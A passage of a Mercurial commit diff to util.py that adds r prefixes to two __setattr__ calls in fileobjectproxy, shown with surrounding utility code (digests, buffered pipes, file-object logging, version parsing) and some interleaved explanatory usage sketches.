util: add missing r prefix on some __setattr__ calls...
Augie Fackler
r36602:f5427483 default
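For context on the two-line change in this diff: Mercurial's Python 3 porting layer rewrites unprefixed string literals in its own source into bytes literals, while `object.__setattr__` requires the attribute name to be a native str on Python 3. Prefixing a literal with `r` exempts it from that rewrite. A minimal sketch of the failure mode this commit avoids (the source transformer itself is only summarized in the comments, not reproduced):

    class holder(object):
        pass

    obj = holder()

    # Under the transformer, an unprefixed '_orig' would become b'_orig',
    # and on Python 3 the call would raise:
    #     TypeError: attribute name must be string, not 'bytes'
    # object.__setattr__(obj, b'_orig', 42)
    object.__setattr__(obj, r'_orig', 42)   # r-prefixed: stays a native str
    assert obj._orig == 42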
@@ -1,4298 +1,4298 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import io
30 30 import itertools
31 31 import mmap
32 32 import os
33 33 import platform as pyplatform
34 34 import re as remod
35 35 import shutil
36 36 import signal
37 37 import socket
38 38 import stat
39 39 import string
40 40 import subprocess
41 41 import sys
42 42 import tempfile
43 43 import textwrap
44 44 import time
45 45 import traceback
46 46 import warnings
47 47 import zlib
48 48
49 49 from . import (
50 50 encoding,
51 51 error,
52 52 i18n,
53 53 node as nodemod,
54 54 policy,
55 55 pycompat,
56 56 urllibcompat,
57 57 )
58 58
59 59 base85 = policy.importmod(r'base85')
60 60 osutil = policy.importmod(r'osutil')
61 61 parsers = policy.importmod(r'parsers')
62 62
63 63 b85decode = base85.b85decode
64 64 b85encode = base85.b85encode
65 65
66 66 cookielib = pycompat.cookielib
67 67 empty = pycompat.empty
68 68 httplib = pycompat.httplib
69 69 pickle = pycompat.pickle
70 70 queue = pycompat.queue
71 71 socketserver = pycompat.socketserver
72 72 stderr = pycompat.stderr
73 73 stdin = pycompat.stdin
74 74 stdout = pycompat.stdout
75 75 stringio = pycompat.stringio
76 76 xmlrpclib = pycompat.xmlrpclib
77 77
78 78 httpserver = urllibcompat.httpserver
79 79 urlerr = urllibcompat.urlerr
80 80 urlreq = urllibcompat.urlreq
81 81
82 82 # workaround for win32mbcs
83 83 _filenamebytestr = pycompat.bytestr
84 84
85 85 def isatty(fp):
86 86 try:
87 87 return fp.isatty()
88 88 except AttributeError:
89 89 return False
90 90
91 91 # glibc determines buffering on first write to stdout - if we replace a TTY
92 92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 93 # buffering
94 94 if isatty(stdout):
95 95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
96 96
97 97 if pycompat.iswindows:
98 98 from . import windows as platform
99 99 stdout = platform.winstdout(stdout)
100 100 else:
101 101 from . import posix as platform
102 102
103 103 _ = i18n._
104 104
105 105 bindunixsocket = platform.bindunixsocket
106 106 cachestat = platform.cachestat
107 107 checkexec = platform.checkexec
108 108 checklink = platform.checklink
109 109 copymode = platform.copymode
110 110 executablepath = platform.executablepath
111 111 expandglobs = platform.expandglobs
112 112 explainexit = platform.explainexit
113 113 findexe = platform.findexe
114 114 getfsmountpoint = platform.getfsmountpoint
115 115 getfstype = platform.getfstype
116 116 gethgcmd = platform.gethgcmd
117 117 getuser = platform.getuser
118 118 getpid = os.getpid
119 119 groupmembers = platform.groupmembers
120 120 groupname = platform.groupname
121 121 hidewindow = platform.hidewindow
122 122 isexec = platform.isexec
123 123 isowner = platform.isowner
124 124 listdir = osutil.listdir
125 125 localpath = platform.localpath
126 126 lookupreg = platform.lookupreg
127 127 makedir = platform.makedir
128 128 nlinks = platform.nlinks
129 129 normpath = platform.normpath
130 130 normcase = platform.normcase
131 131 normcasespec = platform.normcasespec
132 132 normcasefallback = platform.normcasefallback
133 133 openhardlinks = platform.openhardlinks
134 134 oslink = platform.oslink
135 135 parsepatchoutput = platform.parsepatchoutput
136 136 pconvert = platform.pconvert
137 137 poll = platform.poll
138 138 popen = platform.popen
139 139 posixfile = platform.posixfile
140 140 quotecommand = platform.quotecommand
141 141 readpipe = platform.readpipe
142 142 rename = platform.rename
143 143 removedirs = platform.removedirs
144 144 samedevice = platform.samedevice
145 145 samefile = platform.samefile
146 146 samestat = platform.samestat
147 147 setbinary = platform.setbinary
148 148 setflags = platform.setflags
149 149 setsignalhandler = platform.setsignalhandler
150 150 shellquote = platform.shellquote
151 151 shellsplit = platform.shellsplit
152 152 spawndetached = platform.spawndetached
153 153 split = platform.split
154 154 sshargs = platform.sshargs
155 155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 156 statisexec = platform.statisexec
157 157 statislink = platform.statislink
158 158 testpid = platform.testpid
159 159 umask = platform.umask
160 160 unlink = platform.unlink
161 161 username = platform.username
162 162
163 163 try:
164 164 recvfds = osutil.recvfds
165 165 except AttributeError:
166 166 pass
167 167 try:
168 168 setprocname = osutil.setprocname
169 169 except AttributeError:
170 170 pass
171 171 try:
172 172 unblocksignal = osutil.unblocksignal
173 173 except AttributeError:
174 174 pass
175 175
176 176 # Python compatibility
177 177
178 178 _notset = object()
179 179
180 180 # disable Python's problematic floating point timestamps (issue4836)
181 181 # (Python hypocritically says you shouldn't change this behavior in
182 182 # libraries, and sure enough Mercurial is not a library.)
183 183 os.stat_float_times(False)
184 184
185 185 def safehasattr(thing, attr):
186 186 return getattr(thing, attr, _notset) is not _notset
187 187
188 188 def _rapply(f, xs):
189 189 if xs is None:
190 190 # assume None means non-value of optional data
191 191 return xs
192 192 if isinstance(xs, (list, set, tuple)):
193 193 return type(xs)(_rapply(f, x) for x in xs)
194 194 if isinstance(xs, dict):
195 195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
196 196 return f(xs)
197 197
198 198 def rapply(f, xs):
199 199 """Apply function recursively to every item preserving the data structure
200 200
201 201 >>> def f(x):
202 202 ... return 'f(%s)' % x
203 203 >>> rapply(f, None) is None
204 204 True
205 205 >>> rapply(f, 'a')
206 206 'f(a)'
207 207 >>> rapply(f, {'a'}) == {'f(a)'}
208 208 True
209 209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
210 210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
211 211
212 212 >>> xs = [object()]
213 213 >>> rapply(pycompat.identity, xs) is xs
214 214 True
215 215 """
216 216 if f is pycompat.identity:
217 217 # fast path mainly for py2
218 218 return xs
219 219 return _rapply(f, xs)
220 220
221 221 def bytesinput(fin, fout, *args, **kwargs):
222 222 sin, sout = sys.stdin, sys.stdout
223 223 try:
224 224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
225 225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
226 226 finally:
227 227 sys.stdin, sys.stdout = sin, sout
228 228
229 229 def bitsfrom(container):
230 230 bits = 0
231 231 for bit in container:
232 232 bits |= bit
233 233 return bits
234 234
235 235 # python 2.6 still has deprecation warnings enabled by default. We do not
236 236 # want to display anything to the standard user, so detect if we are running
237 237 # the test suite and only emit python deprecation warnings in that case.
238 238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
239 239 if _dowarn:
240 240 # explicitly unfilter our warning for python 2.7
241 241 #
242 242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
243 243 # However, module name set through PYTHONWARNINGS was exactly matched, so
244 244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
245 245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
248 248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
249 249
250 250 def nouideprecwarn(msg, version, stacklevel=1):
251 251 """Issue an python native deprecation warning
252 252
253 253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
254 254 """
255 255 if _dowarn:
256 256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
257 257 " update your code.)") % version
258 258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
259 259
260 260 DIGESTS = {
261 261 'md5': hashlib.md5,
262 262 'sha1': hashlib.sha1,
263 263 'sha512': hashlib.sha512,
264 264 }
265 265 # List of digest types from strongest to weakest
266 266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
267 267
268 268 for k in DIGESTS_BY_STRENGTH:
269 269 assert k in DIGESTS
270 270
271 271 class digester(object):
272 272 """helper to compute digests.
273 273
274 274 This helper can be used to compute one or more digests given their name.
275 275
276 276 >>> d = digester([b'md5', b'sha1'])
277 277 >>> d.update(b'foo')
278 278 >>> [k for k in sorted(d)]
279 279 ['md5', 'sha1']
280 280 >>> d[b'md5']
281 281 'acbd18db4cc2f85cedef654fccc4a4d8'
282 282 >>> d[b'sha1']
283 283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
284 284 >>> digester.preferred([b'md5', b'sha1'])
285 285 'sha1'
286 286 """
287 287
288 288 def __init__(self, digests, s=''):
289 289 self._hashes = {}
290 290 for k in digests:
291 291 if k not in DIGESTS:
292 292 raise Abort(_('unknown digest type: %s') % k)
293 293 self._hashes[k] = DIGESTS[k]()
294 294 if s:
295 295 self.update(s)
296 296
297 297 def update(self, data):
298 298 for h in self._hashes.values():
299 299 h.update(data)
300 300
301 301 def __getitem__(self, key):
302 302 if key not in DIGESTS:
303 303 raise Abort(_('unknown digest type: %s') % key)
304 304 return nodemod.hex(self._hashes[key].digest())
305 305
306 306 def __iter__(self):
307 307 return iter(self._hashes)
308 308
309 309 @staticmethod
310 310 def preferred(supported):
311 311 """returns the strongest digest type in both supported and DIGESTS."""
312 312
313 313 for k in DIGESTS_BY_STRENGTH:
314 314 if k in supported:
315 315 return k
316 316 return None
317 317
318 318 class digestchecker(object):
319 319 """file handle wrapper that additionally checks content against a given
320 320 size and digests.
321 321
322 322 d = digestchecker(fh, size, {'md5': '...'})
323 323
324 324 When multiple digests are given, all of them are validated.
325 325 """
326 326
327 327 def __init__(self, fh, size, digests):
328 328 self._fh = fh
329 329 self._size = size
330 330 self._got = 0
331 331 self._digests = dict(digests)
332 332 self._digester = digester(self._digests.keys())
333 333
334 334 def read(self, length=-1):
335 335 content = self._fh.read(length)
336 336 self._digester.update(content)
337 337 self._got += len(content)
338 338 return content
339 339
340 340 def validate(self):
341 341 if self._size != self._got:
342 342 raise Abort(_('size mismatch: expected %d, got %d') %
343 343 (self._size, self._got))
344 344 for k, v in self._digests.items():
345 345 if v != self._digester[k]:
346 346 # i18n: first parameter is a digest name
347 347 raise Abort(_('%s mismatch: expected %s, got %s') %
348 348 (k, v, self._digester[k]))
349 349
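A minimal usage sketch for digestchecker, written against the Python 2 semantics this file targets (the payload and its expected digest are computed inline; any size or digest mismatch makes validate() raise Abort):

    import hashlib
    import io

    payload = b'some transferred data'
    expected = {'md5': hashlib.md5(payload).hexdigest()}

    fh = digestchecker(io.BytesIO(payload), len(payload), expected)
    while fh.read(4096):
        pass          # consume everything so size and digests are complete
    fh.validate()     # silent on success; raises Abort on any mismatch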
350 350 try:
351 351 buffer = buffer
352 352 except NameError:
353 353 def buffer(sliceable, offset=0, length=None):
354 354 if length is not None:
355 355 return memoryview(sliceable)[offset:offset + length]
356 356 return memoryview(sliceable)[offset:]
357 357
358 358 closefds = pycompat.isposix
359 359
360 360 _chunksize = 4096
361 361
362 362 class bufferedinputpipe(object):
363 363 """a manually buffered input pipe
364 364
365 365 Python will not let us use buffered IO and lazy reading with 'polling' at
366 366 the same time. We cannot probe the buffer state and select will not detect
367 367 that data are ready to read if they are already buffered.
368 368
369 369 This class lets us work around that by implementing its own buffering
370 370 (allowing efficient readline) while offering a way to know if the buffer is
371 371 empty from the output (allowing collaboration of the buffer with polling).
372 372
373 373 This class lives in the 'util' module because it makes use of the 'os'
374 374 module from the python stdlib.
375 375 """
376 376 def __new__(cls, fh):
377 377 # If we receive a fileobjectproxy, we need to use a variation of this
378 378 # class that notifies observers about activity.
379 379 if isinstance(fh, fileobjectproxy):
380 380 cls = observedbufferedinputpipe
381 381
382 382 return super(bufferedinputpipe, cls).__new__(cls)
383 383
384 384 def __init__(self, input):
385 385 self._input = input
386 386 self._buffer = []
387 387 self._eof = False
388 388 self._lenbuf = 0
389 389
390 390 @property
391 391 def hasbuffer(self):
392 392 """True is any data is currently buffered
393 393
394 394 This will be used externally a pre-step for polling IO. If there is
395 395 already data then no polling should be set in place."""
396 396 return bool(self._buffer)
397 397
398 398 @property
399 399 def closed(self):
400 400 return self._input.closed
401 401
402 402 def fileno(self):
403 403 return self._input.fileno()
404 404
405 405 def close(self):
406 406 return self._input.close()
407 407
408 408 def read(self, size):
409 409 while (not self._eof) and (self._lenbuf < size):
410 410 self._fillbuffer()
411 411 return self._frombuffer(size)
412 412
413 413 def readline(self, *args, **kwargs):
414 414 if 1 < len(self._buffer):
415 415 # this should not happen because both read and readline end with a
416 416 # _frombuffer call that collapses it.
417 417 self._buffer = [''.join(self._buffer)]
418 418 self._lenbuf = len(self._buffer[0])
419 419 lfi = -1
420 420 if self._buffer:
421 421 lfi = self._buffer[-1].find('\n')
422 422 while (not self._eof) and lfi < 0:
423 423 self._fillbuffer()
424 424 if self._buffer:
425 425 lfi = self._buffer[-1].find('\n')
426 426 size = lfi + 1
427 427 if lfi < 0: # end of file
428 428 size = self._lenbuf
429 429 elif 1 < len(self._buffer):
430 430 # we need to take previous chunks into account
431 431 size += self._lenbuf - len(self._buffer[-1])
432 432 return self._frombuffer(size)
433 433
434 434 def _frombuffer(self, size):
435 435 """return at most 'size' data from the buffer
436 436
437 437 The data are removed from the buffer."""
438 438 if size == 0 or not self._buffer:
439 439 return ''
440 440 buf = self._buffer[0]
441 441 if 1 < len(self._buffer):
442 442 buf = ''.join(self._buffer)
443 443
444 444 data = buf[:size]
445 445 buf = buf[len(data):]
446 446 if buf:
447 447 self._buffer = [buf]
448 448 self._lenbuf = len(buf)
449 449 else:
450 450 self._buffer = []
451 451 self._lenbuf = 0
452 452 return data
453 453
454 454 def _fillbuffer(self):
455 455 """read data to the buffer"""
456 456 data = os.read(self._input.fileno(), _chunksize)
457 457 if not data:
458 458 self._eof = True
459 459 else:
460 460 self._lenbuf += len(data)
461 461 self._buffer.append(data)
462 462
463 463 return data
464 464
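A sketch of the intended read-or-poll pattern on POSIX (a child process writing lines to a pipe is assumed; hasbuffer is probed before blocking in select, since already-buffered data would never wake it):

    import select
    import subprocess

    proc = subprocess.Popen(['cat'], stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    pipe = bufferedinputpipe(proc.stdout)
    proc.stdin.write(b'hello\nworld\n')
    proc.stdin.close()

    # Poll only when nothing is buffered; select() cannot see buffered data.
    if not pipe.hasbuffer:
        select.select([pipe], [], [])
    line = pipe.readline()    # first line, b'hello\n'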
465 465 def mmapread(fp):
466 466 try:
467 467 fd = getattr(fp, 'fileno', lambda: fp)()
468 468 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
469 469 except ValueError:
470 470 # Empty files cannot be mmapped, but mmapread should still work. Check
471 471 # if the file is empty, and if so, return an empty buffer.
472 472 if os.fstat(fd).st_size == 0:
473 473 return ''
474 474 raise
475 475
476 476 def popen2(cmd, env=None, newlines=False):
477 477 # Setting bufsize to -1 lets the system decide the buffer size.
478 478 # The default for bufsize is 0, meaning unbuffered. This leads to
479 479 # poor performance on Mac OS X: http://bugs.python.org/issue4194
480 480 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
481 481 close_fds=closefds,
482 482 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
483 483 universal_newlines=newlines,
484 484 env=env)
485 485 return p.stdin, p.stdout
486 486
487 487 def popen3(cmd, env=None, newlines=False):
488 488 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
489 489 return stdin, stdout, stderr
490 490
491 491 def popen4(cmd, env=None, newlines=False, bufsize=-1):
492 492 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
493 493 close_fds=closefds,
494 494 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
495 495 stderr=subprocess.PIPE,
496 496 universal_newlines=newlines,
497 497 env=env)
498 498 return p.stdin, p.stdout, p.stderr, p
499 499
500 500 class fileobjectproxy(object):
501 501 """A proxy around file objects that tells a watcher when events occur.
502 502
503 503 This type is intended to only be used for testing purposes. Think hard
504 504 before using it in important code.
505 505 """
506 506 __slots__ = (
507 507 r'_orig',
508 508 r'_observer',
509 509 )
510 510
511 511 def __init__(self, fh, observer):
512     - object.__setattr__(self, '_orig', fh)
513     - object.__setattr__(self, '_observer', observer)
    512 + object.__setattr__(self, r'_orig', fh)
    513 + object.__setattr__(self, r'_observer', observer)
514 514
515 515 def __getattribute__(self, name):
516 516 ours = {
517 517 r'_observer',
518 518
519 519 # IOBase
520 520 r'close',
521 521 # closed if a property
522 522 r'fileno',
523 523 r'flush',
524 524 r'isatty',
525 525 r'readable',
526 526 r'readline',
527 527 r'readlines',
528 528 r'seek',
529 529 r'seekable',
530 530 r'tell',
531 531 r'truncate',
532 532 r'writable',
533 533 r'writelines',
534 534 # RawIOBase
535 535 r'read',
536 536 r'readall',
537 537 r'readinto',
538 538 r'write',
539 539 # BufferedIOBase
540 540 # raw is a property
541 541 r'detach',
542 542 # read defined above
543 543 r'read1',
544 544 # readinto defined above
545 545 # write defined above
546 546 }
547 547
548 548 # We only observe some methods.
549 549 if name in ours:
550 550 return object.__getattribute__(self, name)
551 551
552 552 return getattr(object.__getattribute__(self, r'_orig'), name)
553 553
554 554 def __delattr__(self, name):
555 555 return delattr(object.__getattribute__(self, r'_orig'), name)
556 556
557 557 def __setattr__(self, name, value):
558 558 return setattr(object.__getattribute__(self, r'_orig'), name, value)
559 559
560 560 def __iter__(self):
561 561 return object.__getattribute__(self, r'_orig').__iter__()
562 562
563 563 def _observedcall(self, name, *args, **kwargs):
564 564 # Call the original object.
565 565 orig = object.__getattribute__(self, r'_orig')
566 566 res = getattr(orig, name)(*args, **kwargs)
567 567
568 568 # Call a method on the observer of the same name with arguments
569 569 # so it can react, log, etc.
570 570 observer = object.__getattribute__(self, r'_observer')
571 571 fn = getattr(observer, name, None)
572 572 if fn:
573 573 fn(res, *args, **kwargs)
574 574
575 575 return res
576 576
577 577 def close(self, *args, **kwargs):
578 578 return object.__getattribute__(self, r'_observedcall')(
579 579 r'close', *args, **kwargs)
580 580
581 581 def fileno(self, *args, **kwargs):
582 582 return object.__getattribute__(self, r'_observedcall')(
583 583 r'fileno', *args, **kwargs)
584 584
585 585 def flush(self, *args, **kwargs):
586 586 return object.__getattribute__(self, r'_observedcall')(
587 587 r'flush', *args, **kwargs)
588 588
589 589 def isatty(self, *args, **kwargs):
590 590 return object.__getattribute__(self, r'_observedcall')(
591 591 r'isatty', *args, **kwargs)
592 592
593 593 def readable(self, *args, **kwargs):
594 594 return object.__getattribute__(self, r'_observedcall')(
595 595 r'readable', *args, **kwargs)
596 596
597 597 def readline(self, *args, **kwargs):
598 598 return object.__getattribute__(self, r'_observedcall')(
599 599 r'readline', *args, **kwargs)
600 600
601 601 def readlines(self, *args, **kwargs):
602 602 return object.__getattribute__(self, r'_observedcall')(
603 603 r'readlines', *args, **kwargs)
604 604
605 605 def seek(self, *args, **kwargs):
606 606 return object.__getattribute__(self, r'_observedcall')(
607 607 r'seek', *args, **kwargs)
608 608
609 609 def seekable(self, *args, **kwargs):
610 610 return object.__getattribute__(self, r'_observedcall')(
611 611 r'seekable', *args, **kwargs)
612 612
613 613 def tell(self, *args, **kwargs):
614 614 return object.__getattribute__(self, r'_observedcall')(
615 615 r'tell', *args, **kwargs)
616 616
617 617 def truncate(self, *args, **kwargs):
618 618 return object.__getattribute__(self, r'_observedcall')(
619 619 r'truncate', *args, **kwargs)
620 620
621 621 def writable(self, *args, **kwargs):
622 622 return object.__getattribute__(self, r'_observedcall')(
623 623 r'writable', *args, **kwargs)
624 624
625 625 def writelines(self, *args, **kwargs):
626 626 return object.__getattribute__(self, r'_observedcall')(
627 627 r'writelines', *args, **kwargs)
628 628
629 629 def read(self, *args, **kwargs):
630 630 return object.__getattribute__(self, r'_observedcall')(
631 631 r'read', *args, **kwargs)
632 632
633 633 def readall(self, *args, **kwargs):
634 634 return object.__getattribute__(self, r'_observedcall')(
635 635 r'readall', *args, **kwargs)
636 636
637 637 def readinto(self, *args, **kwargs):
638 638 return object.__getattribute__(self, r'_observedcall')(
639 639 r'readinto', *args, **kwargs)
640 640
641 641 def write(self, *args, **kwargs):
642 642 return object.__getattribute__(self, r'_observedcall')(
643 643 r'write', *args, **kwargs)
644 644
645 645 def detach(self, *args, **kwargs):
646 646 return object.__getattribute__(self, r'_observedcall')(
647 647 r'detach', *args, **kwargs)
648 648
649 649 def read1(self, *args, **kwargs):
650 650 return object.__getattribute__(self, r'_observedcall')(
651 651 r'read1', *args, **kwargs)
652 652
653 653 class observedbufferedinputpipe(bufferedinputpipe):
654 654 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
655 655
656 656 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
657 657 bypass ``fileobjectproxy``. Because of this, we need to make
658 658 ``bufferedinputpipe`` aware of these operations.
659 659
660 660 This variation of ``bufferedinputpipe`` can notify observers about
661 661 ``os.read()`` events. It also re-publishes other events, such as
662 662 ``read()`` and ``readline()``.
663 663 """
664 664 def _fillbuffer(self):
665 665 res = super(observedbufferedinputpipe, self)._fillbuffer()
666 666
667 667 fn = getattr(self._input._observer, r'osread', None)
668 668 if fn:
669 669 fn(res, _chunksize)
670 670
671 671 return res
672 672
673 673 # We use different observer methods because the operation isn't
674 674 # performed on the actual file object but on us.
675 675 def read(self, size):
676 676 res = super(observedbufferedinputpipe, self).read(size)
677 677
678 678 fn = getattr(self._input._observer, r'bufferedread', None)
679 679 if fn:
680 680 fn(res, size)
681 681
682 682 return res
683 683
684 684 def readline(self, *args, **kwargs):
685 685 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
686 686
687 687 fn = getattr(self._input._observer, r'bufferedreadline', None)
688 688 if fn:
689 689 fn(res)
690 690
691 691 return res
692 692
693 693 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
694 694 DATA_ESCAPE_MAP.update({
695 695 b'\\': b'\\\\',
696 696 b'\r': br'\r',
697 697 b'\n': br'\n',
698 698 })
699 699 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
700 700
701 701 def escapedata(s):
702 702 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
703 703
704 704 class fileobjectobserver(object):
705 705 """Logs file object activity."""
706 706 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
707 707 self.fh = fh
708 708 self.name = name
709 709 self.logdata = logdata
710 710 self.reads = reads
711 711 self.writes = writes
712 712
713 713 def _writedata(self, data):
714 714 if not self.logdata:
715 715 self.fh.write('\n')
716 716 return
717 717
718 718 # Simple case writes all data on a single line.
719 719 if b'\n' not in data:
720 720 self.fh.write(': %s\n' % escapedata(data))
721 721 return
722 722
723 723 # Data with newlines is written to multiple lines.
724 724 self.fh.write(':\n')
725 725 lines = data.splitlines(True)
726 726 for line in lines:
727 727 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
728 728
729 729 def read(self, res, size=-1):
730 730 if not self.reads:
731 731 return
732 732
733 733 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
734 734 self._writedata(res)
735 735
736 736 def readline(self, res, limit=-1):
737 737 if not self.reads:
738 738 return
739 739
740 740 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
741 741 self._writedata(res)
742 742
743 743 def write(self, res, data):
744 744 if not self.writes:
745 745 return
746 746
747 747 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
748 748 self._writedata(data)
749 749
750 750 def flush(self, res):
751 751 if not self.writes:
752 752 return
753 753
754 754 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
755 755
756 756 # For observedbufferedinputpipe.
757 757 def bufferedread(self, res, size):
758 758 self.fh.write('%s> bufferedread(%d) -> %d' % (
759 759 self.name, size, len(res)))
760 760 self._writedata(res)
761 761
762 762 def bufferedreadline(self, res):
763 763 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
764 764 self._writedata(res)
765 765
766 766 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
767 767 logdata=False):
768 768 """Turn a file object into a logging file object."""
769 769
770 770 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
771 771 logdata=logdata)
772 772 return fileobjectproxy(fh, observer)
773 773
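A sketch showing the proxy/observer pair end to end, again under the Python 2 string semantics this module assumes (both handles are in-memory; 'src' is just the label used in log lines):

    import io

    logfh = io.BytesIO()
    proxied = makeloggingfileobject(logfh, io.BytesIO(b'payload'), 'src',
                                    logdata=True)
    proxied.read(4)
    # The observer recorded the call and, with logdata=True, the data:
    #     src> read(4) -> 4: payl
    print(logfh.getvalue())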
774 774 def version():
775 775 """Return version information if available."""
776 776 try:
777 777 from . import __version__
778 778 return __version__.version
779 779 except ImportError:
780 780 return 'unknown'
781 781
782 782 def versiontuple(v=None, n=4):
783 783 """Parses a Mercurial version string into an N-tuple.
784 784
785 785 The version string to be parsed is specified with the ``v`` argument.
786 786 If it isn't defined, the current Mercurial version string will be parsed.
787 787
788 788 ``n`` can be 2, 3, or 4. Here is how some version strings map to
789 789 returned values:
790 790
791 791 >>> v = b'3.6.1+190-df9b73d2d444'
792 792 >>> versiontuple(v, 2)
793 793 (3, 6)
794 794 >>> versiontuple(v, 3)
795 795 (3, 6, 1)
796 796 >>> versiontuple(v, 4)
797 797 (3, 6, 1, '190-df9b73d2d444')
798 798
799 799 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
800 800 (3, 6, 1, '190-df9b73d2d444+20151118')
801 801
802 802 >>> v = b'3.6'
803 803 >>> versiontuple(v, 2)
804 804 (3, 6)
805 805 >>> versiontuple(v, 3)
806 806 (3, 6, None)
807 807 >>> versiontuple(v, 4)
808 808 (3, 6, None, None)
809 809
810 810 >>> v = b'3.9-rc'
811 811 >>> versiontuple(v, 2)
812 812 (3, 9)
813 813 >>> versiontuple(v, 3)
814 814 (3, 9, None)
815 815 >>> versiontuple(v, 4)
816 816 (3, 9, None, 'rc')
817 817
818 818 >>> v = b'3.9-rc+2-02a8fea4289b'
819 819 >>> versiontuple(v, 2)
820 820 (3, 9)
821 821 >>> versiontuple(v, 3)
822 822 (3, 9, None)
823 823 >>> versiontuple(v, 4)
824 824 (3, 9, None, 'rc+2-02a8fea4289b')
825 825 """
826 826 if not v:
827 827 v = version()
828 828 parts = remod.split('[\+-]', v, 1)
829 829 if len(parts) == 1:
830 830 vparts, extra = parts[0], None
831 831 else:
832 832 vparts, extra = parts
833 833
834 834 vints = []
835 835 for i in vparts.split('.'):
836 836 try:
837 837 vints.append(int(i))
838 838 except ValueError:
839 839 break
840 840 # (3, 6) -> (3, 6, None)
841 841 while len(vints) < 3:
842 842 vints.append(None)
843 843
844 844 if n == 2:
845 845 return (vints[0], vints[1])
846 846 if n == 3:
847 847 return (vints[0], vints[1], vints[2])
848 848 if n == 4:
849 849 return (vints[0], vints[1], vints[2], extra)
850 850
851 851 # used by parsedate
852 852 defaultdateformats = (
853 853 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
854 854 '%Y-%m-%dT%H:%M', # without seconds
855 855 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
856 856 '%Y-%m-%dT%H%M', # without seconds
857 857 '%Y-%m-%d %H:%M:%S', # our common legal variant
858 858 '%Y-%m-%d %H:%M', # without seconds
859 859 '%Y-%m-%d %H%M%S', # without :
860 860 '%Y-%m-%d %H%M', # without seconds
861 861 '%Y-%m-%d %I:%M:%S%p',
862 862 '%Y-%m-%d %H:%M',
863 863 '%Y-%m-%d %I:%M%p',
864 864 '%Y-%m-%d',
865 865 '%m-%d',
866 866 '%m/%d',
867 867 '%m/%d/%y',
868 868 '%m/%d/%Y',
869 869 '%a %b %d %H:%M:%S %Y',
870 870 '%a %b %d %I:%M:%S%p %Y',
871 871 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
872 872 '%b %d %H:%M:%S %Y',
873 873 '%b %d %I:%M:%S%p %Y',
874 874 '%b %d %H:%M:%S',
875 875 '%b %d %I:%M:%S%p',
876 876 '%b %d %H:%M',
877 877 '%b %d %I:%M%p',
878 878 '%b %d %Y',
879 879 '%b %d',
880 880 '%H:%M:%S',
881 881 '%I:%M:%S%p',
882 882 '%H:%M',
883 883 '%I:%M%p',
884 884 )
885 885
886 886 extendeddateformats = defaultdateformats + (
887 887 "%Y",
888 888 "%Y-%m",
889 889 "%b",
890 890 "%b %Y",
891 891 )
892 892
893 893 def cachefunc(func):
894 894 '''cache the result of function calls'''
895 895 # XXX doesn't handle keyword args
896 896 if func.__code__.co_argcount == 0:
897 897 cache = []
898 898 def f():
899 899 if len(cache) == 0:
900 900 cache.append(func())
901 901 return cache[0]
902 902 return f
903 903 cache = {}
